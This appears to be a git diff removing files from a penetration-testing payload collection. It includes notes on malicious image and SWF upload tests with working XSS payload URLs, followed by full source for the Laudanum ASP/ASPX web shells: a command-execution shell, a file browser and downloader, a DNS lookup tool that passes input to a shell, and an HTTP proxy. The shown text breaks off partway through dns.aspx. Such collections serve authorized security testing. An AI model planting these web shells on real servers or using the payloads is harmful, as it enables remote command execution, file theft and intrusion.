-A specially crafted JPEG (the original file was named lottapixel.jpg) causes attempts to determine the dimensions of the image to exhaust available memory. From the original report:
-
-The exploit is really simple. I have an image of 5kb, 260x260 pixels. In the image itself I exchange the 260x260 values with 0xfafa x 0xfafa (so 64250x64250 pixels). Now from what I remember your service tries to convert the image once uploaded. By loading the 'whole image' into memory, it tries to allocate 4128062500 pixels into memory, flooding the memory and causing DoS.
-
-## uber.gif
-
-Current limits
-
-Image size: 1 MB
-Image dimensions: 2048x2048px
-File types: jpg/png/gif
-
-Another image hack
-
-A GIF composed of 40k 1x1 images made Paperclip freeze until timeout.
-
-As attachments I sent the file composed of 40k images, and a screenshot of the timeout.
-
-## EICAR File
-
-The EICAR Standard Anti-Virus Test File or EICAR test file is a computer file that was developed by the European Institute for Computer Antivirus Research (EICAR) and Computer Antivirus Research Organization (CARO), to test the response of computer antivirus (AV) programs. Instead of using real malware, which could do real damage, this test file allows people to test anti-virus software without having to use a real computer virus.
-
-Anti-virus programmers set the EICAR string as a verified virus, similar to other identified signatures. A compliant virus scanner, when detecting the file, will respond in exactly the same manner as if it found a harmful virus. Not all virus scanners are compliant, and may not detect the file even when they are correctly configured.
-
-The use of the EICAR test string can be more versatile than straightforward detection: a file containing the EICAR test string can be compressed or archived, and then the antivirus software can be run to see whether it can detect the test string in the compressed file.
-
-## xssproject File
-
-As you may already know, it is possible to make a website vulnerable to XSS if you can upload/include a SWF file into that website. I am going to represent this SWF file that you can use in your PoCs.
-
-This method is based on [1] and [2], and it has been tested in Google Chrome, Mozilla Firefox, IE9/8; there should not be any problem with other browsers either.
-
-Examples:
-
-Browsers other than IE: http://0me.me/demo/xss/xssproject.swf?js=alert(document.domain);
-
-IE8: http://0me.me/demo/xss/xssproject.swf?js=try{alert(document.domain)}catch(e){ window.open(‘?js=history.go(-1)’,’_self’);}
-
-IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(‘invalidfileinvalidfileinvalidfile’,’target’);setTimeout(‘alert(w.document.location);w.close();’,1);
-
-## POC_img_phpinfo File
-
-Outlined here: https://www.secgeek.net/bookfresh-vulnerability/

Payloads/laudanum-0.8/asp/dns.asp

@@ -1,153 +0,0 @@
-<%
-' *******************************************************************************
-' ***
-' *** Laudanum Project
-' *** A Collection of Injectable Files used during a Penetration Test
-' ***
-' *** More information is available at:
-' ***  http://laudanum.secureideas.net
-' ***  laudanum@secureideas.net
-' ***
-' ***  Project Leads:
-' ***         Kevin Johnson <kjohnson@secureideas.net
-' ***         Tim Medin <tim@securitywhole.com>
-' ***
-' *** Copyright 2012 by Kevin Johnson and the Laudanum Team
-' ***
-' ********************************************************************************
-' ***
-' *** This file provides access to DNS on the system.
-' *** Written by Tim Medin <timmedin@gmail.com>
-' ***
-' ********************************************************************************
-' *** This program is free software; you can redistribute it and/or
-' *** modify it under the terms of the GNU General Public License
-' *** as published by the Free Software Foundation; either version 2
-' *** of the License, or (at your option) any later version.
-' ***
-' *** This program is distributed in the hope that it will be useful,
-' *** but WITHOUT ANY WARRANTY; without even the implied warranty of
-' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-' *** GNU General Public License for more details.
-' ***
-' *** You can get a copy of the GNU General Public License from this
-' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1
-' *** You can also write to the Free Software Foundation, Inc., Temple
-' *** Place - Suite  Boston, MA   USA.
-' ***
-' ***************************************************************************** */
-
-' ***************** Config entries below ***********************
-
-' IPs are enterable as individual addresses TODO: add CIDR support
-Dim allowedIPs 
-Dim allowed
-Dim qtypes
-Dim qtype
-Dim validtype
-Dim query
-Dim i
-Dim command
-
-allowedIPs = "192.168.0.1,127.0.0.1"
-' Just in cace you added a space in the line above
-allowedIPs = replace(allowedIPS," ","")
-'turn it into an array
-allowedIPs = split(allowedIPS,",") '
-
-' make sure the ip is allowed
-allowed = 0
-for i = lbound(allowedIPs) to ubound(allowedIPs)
-	if allowedIPS(i) = Request.ServerVariables("REMOTE_ADDR") then
-		allowed = 1
-		Exit For
-	end if
-next
-' send a 404 if not the allowed IP
-if allowed = 0 then
-	Response.Status = "404 File Not Found"
-	Response.Write(Response.Status & Request.ServerVariables("REMOTE_ADDR"))
-	Response.End
-end if
-
-%>
-<html>
-<head>
-  <title>Laudanum ASP DNS Access</title>
-  <link rel="stylesheet" href="style.css" type="text/css">
- 
-  <script type="text/javascript">
-    function init() {
-      document.dns.query.focus();
-    }
-  </script>
-</head>
-<body onload="init()">
- 
-<h1>DNS Query 0.1</h1>
-<%
-
-' dns query types as defined as by windows nslookup
-qtypes = split ("ANY,A,AAAA,A+AAAA,CNAME,MX,NS,PTR,SOA,SRV",",")
-qtype = UCase(Request.Form("type"))
-
-' see if the query type is valid, if it isn't then set it.
-validtype = 0
-for i = lbound(qtypes) to ubound(qtypes)
-	if qtype = qtypes(i) then
-		validtype = 1
-		Exit For
-	end if 
-next
-if validtype = 0 then qtype = "ANY"
-
-%>
-<form name="dns" method="POST">
-<fieldset>
-  <legend>DNS Lookup:</legend>
-  <p>Query:<input name="query" type="text">
-  Type:<select name="type">
-<%
-for i = lbound(qtypes) to ubound(qtypes)
-	if qtype = qtypes(i) then
-		Response.Write("<option value=""" & qtypes(i) & """ SELECTED>" & qtypes(i) & "</option>")
-	else
-		
-		Response.Write("<option value=""" & qtypes(i) & """>" & qtypes(i) & "</option>")
-	end if
-next
-%>
-  </select>
-  <input type="submit" value="Submit">
-</fieldset>
-</form>
-<%
-
-' get the query
-query = trim(Request.Form("query"))
-' the query must be sanitized a bit to try to make sure the shell doesn't hang
-query = replace(query, " ", "")
-query = replace(query, ";", "")
-
-if len(query) > 0 then
-	command = "nslookup -type=" & qtype & " " & query 
-	Set objWShell = Server.CreateObject("WScript.Shell")
-	Set objCmd = objWShell.Exec(command)
-	strPResult = objCmd.StdOut.Readall()
-	set objCmd = nothing: Set objWShell = nothing
-	%><pre><%
-	Response.Write command & "<br>"
-	Response.Write replace(strPResult,vbCrLf,"<br>")
-	%></pre><%
-end if
-%>
- <hr/>
-  <address>
-  Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
-  Written by Tim Medin.<br/>
-  Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
-  </address>
-
-</body>
-</html>
-

Payloads/laudanum-0.8/asp/file.asp

@@ -1,179 +0,0 @@
-<%@Language="VBScript"%>
-<%Option Explicit%>
-<%Response.Buffer = True%>  
-<%
-' *******************************************************************************
-' ***
-' *** Laudanum Project
-' *** A Collection of Injectable Files used during a Penetration Test
-' ***
-' *** More information is available at:
-' ***  http://laudanum.secureideas.net
-' ***  laudanum@secureideas.net
-' ***
-' ***  Project Leads:
-' ***         Kevin Johnson <kjohnson@secureideas.net
-' ***         Tim Medin <tim@securitywhole.com>
-' ***
-' *** Copyright 2012 by Kevin Johnson and the Laudanum Team
-' ***
-' ********************************************************************************
-' ***
-' *** This file provides access to the file system.
-' *** Written by Tim Medin <timmedin@gmail.com>
-' ***
-' ********************************************************************************
-' *** This program is free software; you can redistribute it and/or
-' *** modify it under the terms of the GNU General Public License
-' *** as published by the Free Software Foundation; either version 2
-' *** of the License, or (at your option) any later version.
-' ***
-' *** This program is distributed in the hope that it will be useful,
-' *** but WITHOUT ANY WARRANTY; without even the implied warranty of
-' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-' *** GNU General Public License for more details.
-' ***
-' *** You can get a copy of the GNU General Public License from this
-' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1
-' *** You can also write to the Free Software Foundation, Inc., Temple
-' *** Place - Suite  Boston, MA   USA.
-' ***
-' ***************************************************************************** */
-
-' ***************** Config entries below ***********************
-
-' Define variables
-Dim allowedIPs 
-Dim allowed
-Dim filepath
-Dim file
-Dim stream
-Dim path
-Dim i
-Dim fso
-Dim folder 
-Dim list
-Dim temppath
-
-' IPs are enterable as individual addresses TODO: add CIDR support
-allowedIPs = "192.168.0.1,127.0.0.1,::1"
-' Just in cace you added a space in the line above
-allowedIPs = replace(allowedIPS," ","")
-'turn it into an array
-allowedIPs = split(allowedIPS,",") '
-' make sure the ip is allowed
-allowed = 0
-for i = lbound(allowedIPs) to ubound(allowedIPs)
-	if allowedIPS(i) = Request.ServerVariables("REMOTE_ADDR") then
-		allowed = 1
-		exit for
-	end if
-next
-' send a 404 if the IP Address is not allowed
-if allowed = 0 then
-	Response.Status = "404 File Not Found"
-	Response.Write(Response.Status & Request.ServerVariables("REMOTE_ADDR"))
-	Response.End
-end if
-
-' create file object for use everywhere
-set fso = CreateObject("Scripting.FileSystemObject")
-
-' download a file if selected
-filepath = trim(Request.QueryString("file"))
-'validate file
-if len(filepath) > 0 then
-	if fso.FileExists(filepath) then
-		'valid file
-
-		Set file = fso.GetFile(filepath)
-		Response.AddHeader "Content-Disposition", "attachment; filename=" & file.Name  
-		'Response.AddHeader "Content-Length", file.Size  
-		Response.ContentType = "application/octet-stream"
-		set stream = Server.CreateObject("ADODB.Stream")
-		stream.Open
-		stream.Type = 1
-		Response.Charset = "UTF-8"
-		stream.LoadFromFile(file.Path)
-		' TODO: Downloads for files greater than 4Mb may not work since the default buffer limit in IIS is 4Mb.
- 		Response.BinaryWrite(stream.Read)
-		stream.Close
-		set stream = Nothing
-		set file = Nothing
-		Response.End
-	end if
-end if
-
-' begin rendering the page
-%>
-<html>
-<head>
-  <title>Laudanum ASP File Browser</title>
-</head>
-<body>
-
-<h1>Laudanum File Browser 0.1</h1>
-
-<%
-' get the path to work with, if it isn't set or valid then start with the web root
-' goofy if statement is used since vbscript doesn't use short-curcuit logic
-path = trim(Request.QueryString("path"))
-if len(path) = 0 then
-	path = fso.GetFolder(Server.MapPath("\"))
-elseif not fso.FolderExists(path) then
-	path = fso.GetFolder(Server.MapPath("\"))
-end if
-
-set folder = fso.GetFolder(path)
-
-' Special locations, webroot and drives
-%><b>Other Locations:</b> <%
-for each i in fso.Drives
-	if i.IsReady then
-		%><a href="<%=Request.ServerVariables("URL") & "?path=" & i.DriveLetter%>:\"><%=i.DriveLetter%>:</a>&nbsp;&nbsp;<%
-	end if
-next
-%><a href="<%=Request.ServerVariables("URL")%>">web root</a><br/><%
-
-' Information on folder
-%><h2>Listing of: <%
-list = split(folder.path, "\")
-temppath = ""
-for each i in list
-	temppath = temppath & i & "\"
-	%><a href="<%=Request.ServerVariables("URL") & "?path=" & Server.URLEncode(temppath)%>"><%=i%>\</a> <%
-next
-%></h2><%
-
-' build table for listing
-%><table>
-<tr><th align="left">Name</th><th>Size</th><th>Modified</th><th>Accessed</th><th>Created</th></tr><%
-' Parent Path if it exists
-if not folder.IsRootFolder then
-	%><tr><td><a href="<%=Request.ServerVariables("URL") & "?path=" & Server.URLEncode(folder.ParentFolder.Path)%>">..</a></td><%
-end if
-
-' Get the folders
-set list = folder.SubFolders
-for each i in list
-        %><tr><td><a href="<%=Request.ServerVariables("URL") & "?path=" & Server.URLEncode(i.Path)%>"><%=i.Name%>\</a></td></tr><%
-next
-
-' Get the files
-set list = folder.Files
-for each i in list
-        %><tr><td><a href="<%=Request.ServerVariables("URL") & "?file=" & Server.URLEncode(i.Path)%>"><%=i.Name%></a></td><td align="right"><%=FormatNumber(i.Size, 0)%></td><td align="right"><%=i.DateLastModified%></td><td align="right"><%=i.DateLastAccessed%></td><td align="right"><%=i.DateCreated%></td></tr><%
-next
-
-' all done
-%>
- </table>
- <hr/>
-  <address>
-  Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
-  Written by Tim Medin.<br/>
-  Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
-  </address>
-
-</body>
-</html>

Payloads/laudanum-0.8/asp/proxy.asp

@@ -1,454 +0,0 @@
-<%@Language="VBScript"%>
-<%Option Explicit%>
-<%Response.Buffer = True%>  
-<%
-' *******************************************************************************
-' ***
-' *** Laudanum Project
-' *** A Collection of Injectable Files used during a Penetration Test
-' ***
-' *** More information is available at:
-' ***  http://laudanum.secureideas.net
-' ***  laudanum@secureideas.net
-' ***
-' ***  Project Leads:
-' ***         Kevin Johnson <kjohnson@secureideas.net
-' ***         Tim Medin <tim@securitywhole.com>
-' ***
-' *** Copyright 2012 by Kevin Johnson and the Laudanum Team
-' ***
-' ********************************************************************************
-' ***
-' *** This file provides access as a proxy.
-' *** Written by Tim Medin <timmedin@gmail.com>
-' ***
-' ********************************************************************************
-' *** This program is free software; you can redistribute it and/or
-' *** modify it under the terms of the GNU General Public License
-' *** as published by the Free Software Foundation; either version 2
-' *** of the License, or (at your option) any later version.
-' ***
-' *** This program is distributed in the hope that it will be useful,
-' *** but WITHOUT ANY WARRANTY; without even the implied warranty of
-' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-' *** GNU General Public License for more details.
-' ***
-' *** You can get a copy of the GNU General Public License from this
-' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1
-' *** You can also write to the Free Software Foundation, Inc., Temple
-' *** Place - Suite  Boston, MA   USA.
-' ***
-' ***************************************************************************** */
- 
-' ***************** Config entries below ***********************
-
-' Define variables
-Dim allowedIPs 
-Dim allowed
-Dim i
-Dim s 'generic string, yeah, I know bad, but at this point I just want it to work
-Dim urltemp 
-Dim urlscheme
-Dim urlhost
-Dim urlport
-Dim urlpath
-Dim urlfile
-Dim urlquery
-Dim http 
-Dim method
-Dim contenttype
-Dim stream
-Dim regex
-Dim body
-Dim params
-
-function err_handler()
-	%>
-<html>
-<head>
-  <title>Laudanum ASP Proxy</title>
-</head>
-<body>
-  <h1>Fatal Error!</h1>
-  <%=Err.Number%><br/>
-  <%=Err.Message%><br/>
-  <hr/>
-  <address>
-  Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
-  Written by Tim Medin.<br/>
-  Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
-  </address>
-</body>
-</html><%
-end function
-
-function CleanQueryString
-' removes laudurl from the querystring
-Dim i
-Dim j
-Dim s
-Dim key
-Dim q
-
-
-	if len(request.querystring) = 0 then
-		CleanQueryString = ""
-		exit function
-	end if
-
-	' build the request parameters
-	for i = 1 to request.querystring.count
-		key = request.querystring.key(i)
-		'response.write "<br/>key:" & key
-		if key = "laudurl" then
-			' if the key is laudurl, we need check if there is a ? in the string since 
-			' it may have its own query string that doesn't get parsed properly.
-			s = split(request.querystring("laudurl"), "?")
-			if ubound(s) > lbound(s) then
-				' laudurl contains a ?, it must be manually parsed
-				key = left(s(1), instr(s(1), "=") - 1)
-				q = q & "&" & key & "=" & mid(s(1), len(key) + 2)
-			end if
-		else
-			for j = 1 to request.querystring(key).count
-                               	'response.write "<br/>  -value:" & request.querystring(key)(j)
-				q = q & "&" & key & "=" & request.querystring(key)(j)
-			next
-		end if
-	next
-
-	if len(q) > 0 then
-		CleanQueryString = "?" & mid(q, 2)
-	else
-		CleanQueryString = ""
-	end if
-end function
- 
-function CleanFormValues()
-Dim r
-	Set r = New RegExp
-	r.IgnoreCase = true
-	r.Global = true
-
-	' remove the laudurl paramater 
-	r.Pattern = "laudurl=[^&]+($|&)"
-	CleanFormValues = r.Replace(request.form, "") 
-	Set r = nothing
-end function
-
-sub ParseUrl()
-' parses the url into the global variables
-Dim urltemp
-Dim url
-
-	'get the url, it may be in the querystring for a get or from a form in a post
-	url = Request.QueryString("laudurl")
-	if url = "" then
-		url = Request.Form("laudurl")
-	end if
-
-	if url = "" then
-		urlscheme = ""
-		urlhost = ""
-		urlport = ""
-		urlpath = ""
-		urlfile = ""
-		urlquery = ""
-		exit sub
-	end if	
-
-	' Parse the url and break it into its components
-	' this is done so it can be used to rewrite the page
-
-	' ensure the url has a scheme, if it doesn't then assume http
-	if instr(url,"://") = 0 then url = "http://" + url
-
-	' Get the scheme
-	urlscheme = split(url, "://")(0) & "://"
-
-	' urltemp is used to hold the remainder of the url as each portion is parsed
-	urltemp = mid(url, len(urlscheme) + 1)
-	'get the host
-	if instr(urltemp, "/") = 0 then
-		' there is no path so all that is left is the host
-		urlhost = urltemp
-		urlport = ""
-		urlpath = "/"
-		urlfile = ""
-		urlport = ""
-	else
-		' there is more that just the hostname remaining
-		urlhost = left(urltemp, instr(urltemp, "/") - 1)
-		urltemp = mid(urltemp, len(urlhost) + 1)
-
-		' is there a port
-		if instr(urlhost, ":") = 0 then
-			' no port
-			urlport = ""
-		else
-			' there is a port
-			arr = split(urlhost, ":")
-			urlhost = arr(0)
-			urlport = ":" & arr(1)
-		end if
-
-		' all that is left is the path and the query
-		' is there a query?
-		if instr(urltemp, "?") = 0 then
-			' no query
-			urlpath = urltemp
-			'urlquery = ""
-		else
-			'Response.Write "<br><br>" & urltemp & "<br><br>"
-			urlpath = left(urltemp, instr(urltemp, "?") - 1)
-			'urlquery = mid(urltemp, instr(urltemp, "?") + 1)
-		end if
-		
-		if right(urlpath, 1) = "/" then
-			urlfile = ""
-		else
-			' we need to get the path and the file
-			urltemp = split(urlpath, "/")
-			urlfile = urltemp(ubound(urltemp))
-			urlpath = left(urlpath, len(urlpath) - len(urlfile))
-		end if
-	end if 
-
-	urlquery = CleanQueryString
-
-	'response.write "<br>scheme: " & urlscheme
-	'response.write "<br>host: " & urlhost
-	'response.write "<br>port: " & urlport
-	'response.write "<br>path: " & urlpath
-	'response.write "<br>file: " & urlfile
-	'response.write "<br>query: " & urlquery 
-	'response.write "<br>full: " & FullUrl()
-	'response.end
-end sub
-
-function FullUrl()
-	FullUrl = urlscheme & urlhost & urlport & urlpath & urlfile & urlquery
-end function
-
-sub RewriteHeaders()
-Dim i
-Dim header
-Dim headervalue
-Dim regexdomain
-Dim regexpath
-
-	' setup a regular expression to clean the cookie's domain and path
-	Set regexdomain = New RegExp
-	regexdomain.IgnoreCase = true
-	regexdomain.Global = true
-	' rewrite images and links - absolute reference
-	regexdomain.Pattern = "domain=[\S]+"
-
-	Set regexpath = New RegExp
-	regexpath.IgnoreCase = true
-	regexpath.Global = true
-	' rewrite images and links - absolute reference
-	regexpath.Pattern = "path=[\S]+"
-
-	' go through each header
-	for each i in Split(http.getAllResponseHeaders, vbLf)
-		' Break on the \x0a and remove the \x0d if it exists
-		i = Replace(i, vbCr, "")
-		' make sure it is a header and value
-		if instr(i, ":") > 0 then
-			' break the response headers into header and value 
-			header = trim(Left(i, instr(i, ":") - 1))
-			header = replace(header, "_", "-")
-			headervalue = trim(Right(i, len(i) - instr(i, ":")))
-
-			' don't add these two header types since they are handled automatically
-			if lcase(header) <> "content-type" and lcase(header) <> "content-length" and lcase(header) <> "transfer-encoding" then
-				if lcase(header) = "set-cookie" then
-					' strip the domain from the cookie
-					headervalue = regexdomain.replace(headervalue, "")
-					' strip the path from the cookie
-					headervalue = regexpath.replace(headervalue, "")
-					headervalue = trim(headervalue)
-				end if
-				response.AddHeader header, headervalue
-			end if
-		end if
-	next
-	
-	Set regexdomain = nothing
-	Set regexpath = nothing
-end sub
-
-' TODO: Add authentication support so it will work behind a proxy
-' IPs are enterable as individual addresses TODO: add CIDR support
-allowedIPs = "192.168.0.1,127.0.0.1,::1"
-' Just in cace you added a space in the line above
-allowedIPs = replace(allowedIPS," ","")
-'turn it into an array
-allowedIPs = split(allowedIPS,",") '
-' make sure the ip is allowed
-' TODO: change this to 0 for production, it is 1 for testing
-allowed = 0 
-for i = lbound(allowedIPs) to ubound(allowedIPs)
-        if allowedIPS(i) = Request.ServerVariables("REMOTE_ADDR") then
-                allowed = 1
-                exit for
-        end if
-next
-' send a 404 if the IP Address is not allowed
-if allowed = 0 then
-        Response.Status = "404 File Not Found"
-        Response.Write(Response.Status & Request.ServerVariables("REMOTE_ADDR"))
-        Response.End
-end if
-
-
-'initialize variables
-Set http = nothing
-Set regex = nothing
-Set stream = nothing
-
-' Define Constants
-const useMSXML2 = 0
-const chunkSize = 1048576 ' 1MB
-
-' parse the url into its parts
-ParseUrl()
-
-' check if there is a valid url
-if len(FullUrl) = 0 then
-	' no url to proxy, give `em the boring default page
-	
-	' Default layout of the page
-	' First thing you get when you hit the page without giving it a URL
-	%>
-	<html>
-	<head>
-		<title>Laudanum ASP Proxy</title>
-		<script type="text/javascript">
-			function init() {
-				document.proxy.url.focus();
-			}
-		</script>
-	</head>
-	<body onload="init()">
- 
-	<h1>Laudanum ASP Proxy</h1>
- 
-	<form method="GET" name="proxy" action="<%=Request.ServerVariables("URL")%>">
-		<input type="text" name="laudurl" size="70">
-		<input type="submit" value="Submit">
-	</form>
-	<hr/>
-	<address>
-		Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
-		Written by Tim Medin.<br/>
-		Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
-	</address>
-	</body>
-	</html>	<%
-
-	Response.End()
-end if
-
-' Let's get our Proxy on!!!
-' define the request type
-if useMSXML2 = 1 then
-	Set http = Server.CreateObject("MSXML2.XMLHTTP")
-else
-	Set http = Server.CreateObject("Microsoft.XMLHTTP")
-end if
-
-' get the request type
-method = Request.ServerVariables("REQUEST_METHOD")
-
-' setup the request, false means don't send it yet
-http.Open method, FullUrl, False
-
-' send the request
-if method = "POST" then
-	params = CleanFormValues
-	http.setRequestHeader "Content-type", "application/x-www-form-urlencoded"
-	http.setRequestHeader "Content-length", len(params)
-	http.setRequestHeader "Connection", "close"
-	http.Send(params)
-else
-	http.Send
-end if
-
-' Replace the normal headers with the ones from the response
-Response.Clear
-contenttype = http.getResponseHeader("Content-Type")
-Response.ContentType = contenttype
-
-' rewrite the headers. Takes headers and passes them to new request
-RewriteHeaders()
-
-' how to respond? is it text or is it something else?
-if lcase(left(contenttype, 4)) = "text" then
-	' response is text, so we need to rewrite it, but that's later
-	
-
-	' do the rewriting
-	body = http.responseText
-
-	Set regex = New RegExp
-	regex.IgnoreCase = true
-	regex.Global = true
-
-	' rewrite images and links - absolute reference
-	s = urlscheme & urlhost & urlport
-	regex.Pattern = "((src|href).?=.?['""])(\/[^'""]+['""])"
-	body = regex.Replace(body, "$1" & Request.ServerVariables("SCRIPT_NAME") & "?laudurl=" & s & "$3") 
-
-	' rewrite images and links - full reference
-	regex.Pattern = "((src|href).?=.?['""])(http[^'""]+['""])"
-	body = regex.Replace(body, "$1" & Request.ServerVariables("SCRIPT_NAME") & "?laudurl=$3") 
-
-	' rewrite images and links - absolute reference
-	s = urlscheme & urlhost & urlport & urlpath
-	regex.Pattern = "((src|href).?=.?['""])([^\/][^'""]+['""])"
-	body = regex.Replace(body, "$1" & Request.ServerVariables("SCRIPT_NAME") & "?laudurl=" & s & "$3") 
-
-
-	' rewrite forms - absolute reference
-	s = urlscheme & urlhost & urlport
-	regex.Pattern = "(\<form[^\>]+action.?=.?['""])(\/[^'""]+)(['""][^\>]*[\>])"
-	body = regex.Replace(body, "$1" & Request.ServerVariables("SCRIPT_NAME") & "$3<input type=""hidden"" name=""laudurl"" value=""" & s & "$2"">") 
-
-	' rewrite forms - full reference
-	regex.Pattern = "(\<form[^\>]+action.?=.?['""])(http[^'""]+)(['""][^\>]*[\>])"
-	body = regex.Replace(body, "$1" & Request.ServerVariables("SCRIPT_NAME") & "$3<input type=""hidden"" name=""laudurl"" value=""$2"">") 
-
-	' rewrite forms - absolute reference
-	s = urlscheme & urlhost & urlport & urlpath
-	regex.Pattern = "(\<form[^\>]+action.?=.?['""])([^\/][^'""]+)(['""][^\>]*[\>])"
-	body = regex.Replace(body, "$1" & Request.ServerVariables("SCRIPT_NAME") & "$3<input type=""hidden"" name=""laudurl"" value=""" & s & "$2"">") 
-
-	Response.Write(body)
-	
-	Set regex = nothing
-else
-	' some sort of binary response, so stream it
-	Set stream = nothing
-	Set stream = Server.CreateObject("ADODB.Stream")
-	stream.Type = 1 'Binary
-	stream.Open
-	stream.Write http.responseBody
-	stream.Position = 0
-
-	For i = 0 to stream.Size \ chunkSize
-		Response.BinaryWrite(stream.Read(chunkSize))
-	next
-	Set stream = nothing
-end if
-
-Set http = nothing
-
-Response.End
-
-:HandleError
-err_handler
-
-%>
-

Payloads/laudanum-0.8/asp/shell.asp

@@ -1,83 +0,0 @@
-<%
-' *******************************************************************************
-' ***
-' *** Laudanum Project
-' *** A Collection of Injectable Files used during a Penetration Test
-' ***
-' *** More information is available at:
-' ***  http://laudanum.secureideas.net
-' ***  laudanum@secureideas.net
-' ***
-' ***  Project Leads:
-' ***         Kevin Johnson <kjohnson@secureideas.net
-' ***         Tim Medin <tim@securitywhole.com>
-' ***
-' *** Copyright 2012 by Kevin Johnson and the Laudanum Team
-' ***
-' ********************************************************************************
-' ***
-' ***   Updated and fixed by Robin Wood <Digininja>
-' ***   Updated and fixed by Tim Medin <tim@securitywhole.com
-' ***
-' ********************************************************************************
-' *** This program is free software; you can redistribute it and/or
-' *** modify it under the terms of the GNU General Public License
-' *** as published by the Free Software Foundation; either version 2
-' *** of the License, or (at your option) any later version.
-' ***
-' *** This program is distributed in the hope that it will be useful,
-' *** but WITHOUT ANY WARRANTY; without even the implied warranty of
-' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-' *** GNU General Public License for more details.
-' ***
-' *** You can get a copy of the GNU General Public License from this
-' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1
-' *** You can also write to the Free Software Foundation, Inc., Temple
-' *** Place - Suite  Boston, MA   USA.
-' ***
-' ***************************************************************************** */
-
-
-' can set this to 0 for never time out but don't want to kill the server if a script
-' goes into a loop for any reason
-Server.ScriptTimeout = 180
-
-ip=request.ServerVariables("REMOTE_ADDR")
-if ip<>"1.2.3.4" then
- response.Status="404 Page Not Found"
- response.Write(response.Status)
- response.End
-end if
-
-if Request.Form("submit") <> "" then
-   Dim wshell, intReturn, strPResult
-   cmd = Request.Form("cmd")
-   Response.Write ("Running command: " & cmd & "<br />")
-   set wshell = CreateObject("WScript.Shell")
-   Set objCmd = wShell.Exec(cmd)
-   strPResult = objCmd.StdOut.Readall()
-
-   response.write "<br><pre>" & replace(replace(strPResult,"<","&lt;"),vbCrLf,"<br>") & "</pre>"
-
-   set wshell = nothing
-end if
-
-%>
-<html>
-<head><title>Laundanum ASP Shell</title></head>
-<body onload="document.shell.cmd.focus()">
-<form action="shell.asp" method="POST" name="shell">
-Command: <Input width="200" type="text" name="cmd" value="<%=cmd%>" /><br />
-<input type="submit" name="submit" value="Submit" />
-<p>Don't forget that if you want to shell command (not a specific executable) you need to call cmd.exe. It is usually located at C:\Windows\System32\cmd.exe, but to be safe just call %ComSpec%. Also, don't forget to use the /c switch so cmd.exe terminates when your command is done.
-<p>Example command to do a directory listing:<br>
-%ComSpec% /c dir
-</form>
-<hr/>
-<address>
-Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
-Written by Tim Medin.<br/>
-Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
-</address>
-</body>
-</html>

Payloads/laudanum-0.8/aspx/dns.aspx

@@ -1,144 +0,0 @@
-<%@ Page Language="C#"%>
-<%@ Import Namespace="System" %>
-<html><head><title>Laudanum - DNS</title></head><body>
-<script runat="server">
-
-/* *****************************************************************************
-***
-*** Laudanum Project
-*** A Collection of Injectable Files used during a Penetration Test
-***
-*** More information is available at:
-***  http://laudanum.secureideas.com
-***  laudanum@secureideas.com
-***
-***  Project Leads:
-***         Kevin Johnson <kevin@secureideas.com>
-***
-*** Copyright 2012 by Kevin Johnson and the Laudanum Team
-***
-********************************************************************************
-***
-*** This file provides shell access to DNS on the system.
-*** Written by James Jardine <james@secureideas.com>
-***
-********************************************************************************
-*** This program is free software; you can redistribute it and/or
-*** modify it under the terms of the GNU General Public License
-*** as published by the Free Software Foundation; either version 2
-*** of the License, or (at your option) any later version.
-***
-*** This program is distributed in the hope that it will be useful,
-*** but WITHOUT ANY WARRANTY; without even the implied warranty of
-*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-*** GNU General Public License for more details.
-***
-*** You can get a copy of the GNU General Public License from this
-*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
-*** You can also write to the Free Software Foundation, Inc., 59 Temple
-*** Place - Suite 330, Boston, MA  02111-1307, USA.
-***
-***************************************************************************** */
-
-    // ********************* Config entries below ***********************************
-    // IPs are enterable as individual addresses  
-    string[] allowedIPs = new string[3] { "::1", "192.168.1.1", "127.0.0.1" };
-
-    // ***************** No editable content below this line **************************
-
-string stdout = "";
-string stderr = "";
-string[] qtypes = "Any,A,AAAA,A+AAAA,CNAME,MX,NS,PTR,SOA,SRV".Split(',');
-void die() {
-	//HttpContext.Current.Response.Clear();
-	HttpContext.Current.Response.StatusCode = 404;
-	HttpContext.Current.Response.StatusDescription = "Not Found";
-	HttpContext.Current.Response.Write("<h1>404 Not Found</h1>");
-	HttpContext.Current.Server.ClearError();
-	HttpContext.Current.Response.End();
-}
-
-void Page_Load(object sender, System.EventArgs e) {
-	// check if the X-Fordarded-For header exits
-	string remoteIp;
-	if (HttpContext.Current.Request.Headers["X-Forwarded-For"] == null) {
-		remoteIp = Request.UserHostAddress;
-	} else {
-		remoteIp = HttpContext.Current.Request.Headers["X-Forwarded-For"].Split(new char[] { ',' })[0]; 
-	}
-
-	bool validIp = false;
-	foreach (string ip in allowedIPs) {
-		validIp = (validIp || (remoteIp == ip));
-	}
-	
-	if (!validIp) {
-		die();
-	}
-
-    
-    string qType = "Any";
-    bool validType = false;
-    if (Request.Form["type"] != null)
-    {
-        qType = Request.Form["type"].ToString();
-        foreach (string s in qtypes)
-        {
-            if (s == qType)
-            {
-                validType = true;
-                break;
-            }
